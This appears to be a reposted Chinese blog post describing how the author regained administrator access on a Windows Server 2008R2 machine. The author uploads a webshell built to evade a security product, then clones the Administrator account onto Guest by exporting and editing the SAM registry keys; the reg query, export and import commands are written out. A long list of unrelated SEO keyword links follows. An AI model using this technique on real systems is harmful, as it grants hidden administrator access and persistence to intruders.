记一次克隆管理员的经历
发表于:2025-02-02 作者:千家信息网编辑
千家信息网最后更新 2025年02月02日,半夜Server 2008R2安装MS17-010补丁时,重启系统 发现系统密码忘记了还好本地登录的安全策略留了一个guest用户本地搭建了DVWA WEB***测试环境 权限为system通过漏洞上
千家信息网最后更新 2025年02月02日记一次克隆管理员的经历
半夜Server 2008R2安装MS17-010补丁时,重启系统 发现系统密码忘记了
还好本地登录的安全策略留了一个guest用户
本地搭建了DVWA WEB***测试环境 权限为system
通过漏洞上传过狗一句话***
***权限为system权限
可以创建用户 但是无法将用户添加至管理员组 估计是安全狗拦截了提权操作
随后将管理员权限克隆至login用户 登录成功
目标将把Guest提权为Administrator
查询SAM注册表下有什么配置文件
Reg query HKLM\SAM\SAM\Domains\Account\Users
查询用户名
Reg query HKLM\SAM\SAM\Domains\Account\Users\Names
000001F4的配置文件对应的用户为Administrator
000001F5的配置文件对应的用户为Guest
然后把注册表下的键值导出
先把Administrator的键值导出 保存到C盘名称为1.reg
Reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1.reg
再把Guest的键值导出 保存到C盘名称为2.reg
Reg export HKLM\SAM\SAM\Domains\Account\Users\000001F5 c:\2.reg
然后将1.reg "F"的键值数据复制下来 替换2.reg里面的"F"键值
然后在把2.reg导入到注册表
Reg import c:\2.reg
最后使用guest登录
用户家目录等 都变成了Administrator的数据
实际上就是Administrator=Guest
用户
权限
文件
注册表
登录
配置
管理员
管理
安全
名称
数据
系统
查询
成功
一句话
下有
实际
实际上
密码
就是
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
服务器端口怎么插光纤
恢复数据库时的目标时间点
我的世界手游原版生存服务器
美版xs无法连接app服务器
网络安全防护设备指标
检索网络技术服务
代理服务器 打不开网页
河北手机软件开发诚信企业推荐
小学生家庭与网络安全福建
新加坡服务器的价格
2021年网络安全周的活动主题
惠普2622网络安全密钥
大容量存储器安装数据库
复制数据库表格数据
太太猫代理服务器安全吗
软考数据库中级刷题
EPU安装数据库
网络安全入我心写一段话
南环公园网络安全
数据库倒序排序6
加载文本文件数据库
徐州壁球软件开发
网络技术入门书籍6
软件开发哪里好发展
税控盘提示数据库错误该怎么办
宜章电脑软件开发培训哪家好
酒店管理系统服务器网络
plsql建数据库实例
常规服务器81端口开放么
数据库结构技术